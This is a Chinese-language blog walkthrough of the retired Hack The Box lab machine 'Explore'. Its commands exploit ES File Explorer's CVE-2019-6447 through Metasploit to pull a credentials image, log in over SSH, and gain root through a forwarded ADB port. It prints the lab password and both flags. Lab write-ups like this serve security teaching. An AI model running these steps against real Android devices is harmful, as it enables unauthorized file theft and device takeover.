当前位置: 首页 > article >正文

HTB:Explore[WriteUP]

article 2024/11/13 15:56:53

目录

连接至HTB服务器并启动靶机

1.Which port is being used by the ES File Explorer application?

使用nmap对靶机进行全扫描

2.What 2019 CVE ID is ES File Explorer vulnerable to?

3.Give the complete path of the Metasploit module which can be used to exploit the above CVE.

4.What is the password for user kristi on the box?

5.Submit the flag located in /storage/emulated/0/.

USER_FLAG:f32017174c7c7e8f50c6da52891ae250

6.Which port is being filtered by the firewall?

7.What is the standard Google-provided command line tool for interacting with Android debug?

8.Submit the flag located in /data/.

ROOT_FLAG:f04fc82b6d49b41c9b08982be59338c5

连接至HTB服务器并启动靶机

靶机IP:10.10.10.247

分配IP:10.10.16.7

1.Which port is being used by the ES File Explorer application?

使用nmap对靶机进行全扫描

nmap -p- -A 10.10.10.247

由扫描可见,42135端口托管着ES File Explorer应用程序填上去也不知道为啥不对,反正正确答案是59777

2.What 2019 CVE ID is ES File Explorer vulnerable to?

直接使用searchsploit搜索ES File Explorer

searchsploit ES File Explorer

将该EXP拷贝到当前目录下

searchsploit -m 50070.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 50070.py     
  Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/50070
     Path: /usr/share/exploitdb/exploits/android/remote/50070.py
    Codes: CVE-2019-6447
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/50070.py

漏洞编号:CVE-2019-6447

3.Give the complete path of the Metasploit module which can be used to exploit the above CVE.

启动Metasploit

msfconsole

直接搜索ES File Explorer相关模块

search ES File Explorer

该模块完整名:auxiliary/scanner/http/es_file_explorer_open_port

4.What is the password for user kristi on the box?

切换到该模块

use auxiliary/scanner/http/es_file_explorer_open_port

列出该模块所有可填选项

show options

列出该模块所有可选动作

show actions

这里将action设置成LISTPICS以列出该设备所有照片

set action LISTPICS

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action LISTPICS
action => LISTPICS
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

[+] 10.10.10.247:59777   
  concept.jpg (135.33 KB) - 4/21/21 02:38:08 AM: /storage/emulated/0/DCIM/concept.jpg
  anc.png (6.24 KB) - 4/21/21 02:37:50 AM: /storage/emulated/0/DCIM/anc.png
  creds.jpg (1.14 MB) - 4/21/21 02:38:18 AM: /storage/emulated/0/DCIM/creds.jpg
  224_anc.png (124.88 KB) - 4/21/21 02:37:21 AM: /storage/emulated/0/DCIM/224_anc.png

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

尝试取出文件:/storage/emulated/0/DCIM/creds.jpg

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action GETFILE
action => GETFILE
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set ACTIONITEM /storage/emulated/0/DCIM/creds.jpg
ACTIONITEM => /storage/emulated/0/DCIM/creds.jpg
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

[+] 10.10.10.247:59777   - /storage/emulated/0/DCIM/creds.jpg saved to /root/.msf4/loot/20241110084132_default_10.10.10.247_getFile_945793.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

账户:kristi

密码:Kr1sT!5h@Rp3xPl0r3!

5.Submit the flag located in /storage/emulated/0/.

使用上文凭证通过SSH服务登录到靶机(连接不上的检查密码是不是写错了,特别是大小写)

sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@10.10.10.247 -o HostKeyAlgorithms=+ssh-rsa

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@10.10.10.247 -o HostKeyAlgorithms=+ssh-rsa                            
Password authentication
:/ $ whoami
u0_a76

进入/storage/emulated/0/目录下

cd /storage/emulated/0/

查看user.txt内容

cat user.txt

:/ $ cd /storage/emulated/0/
:/storage/emulated/0 $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/storage/emulated/0 $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

USER_FLAG:f32017174c7c7e8f50c6da52891ae250

6.Which port is being filtered by the firewall?

查看靶机网络连接

ss -tlnp

开始我们用nmap对靶机进行过端口扫描,其中5555端口显示为过滤

7.What is the standard Google-provided command line tool for interacting with Android debug?

用于与安卓调试交互的谷歌标准命令行工具是ADB(Android Debug Bridge)。它可以让开发者在电脑上通过命令行对安卓设备进行多种操作,比如安装和卸载应用、获取设备信息、在设备和电脑之间传输文件等。

8.Submit the flag located in /data/.

将靶机5555端口通过SSH服务转发到本地6666端口上

sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@10.10.10.247 -o HostKeyAlgorithms=+ssh-rsa -N -L 6666:localhost:5555

通过adb连接到设备

adb connect 127.0.0.1:6666

查看已连接的设备

adb devices

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# adb devices               
List of devices attached
127.0.0.1:6666  device
emulator-5554   device

设置以root身份连接至设备

adb -s 127.0.0.1:6666 root

连接至设备终端

adb -s 127.0.0.1:6666 shell

寻找root.txt并查看其内容

ROOT_FLAG:f04fc82b6d49b41c9b08982be59338c5


http://www.kler.cn/a/388348.html

相关文章:

  • Java中的不可变集合:性能与安全并重的最佳实践
  • 障碍检测与避障控制 ROS2机器人
  • 从0开始机器学习--Day23--支持向量机
  • Android CarrierConfig 参数项和正则匹配逻辑
  • c/c++--struct对比
  • 灵活就业,真的等同于失业吗?“三无人员”如何齐短板获贷款
  • [Android]查找java类中声明为native方法的具体实现方法
  • 「QT」几何数据类 之 QPolygon 多边形类
  • 增删改查基础项目总结
  • 智能机器人技术:AI 如何赋予机器智能行动
  • 如何使用 Puppeteer 和 Browserless 抓取亚马逊产品数据?
  • 【SQL实验】更新操作
  • 量子计算及其在密码学中的应用
  • Element UI组件Dialog显示闪动问题【解决方案】
  • The First项目报告:MANTRA如何实现世界金融区块链化?
  • 统信UOS开发环境支持Perl
  • 力扣第46题“全排列”
  • 计算机视觉系列----深入浅出了解计算机视觉
  • Leetcode:540. 有序数组中的单一元素
  • Kafka面试题 part-1
  • Unet++改进16:添加DoubleAttention||减少冗余计算和同时存储访问
  • 算法求解 -- (炼码 3853 题)检查是否有路径经过相同数量的0和1
  • 自动化测试工具Ranorex Studio(二十三)-等待UI元素-库超时
  • R和MATLAB及Python混合效应模型
  • 【Flume实操】复制:实时监听 NetCat 端口数据到本地文件系统和 HDFS 案例分析
  • 【工具变量】排污权交易政策试点DID(2000-2023)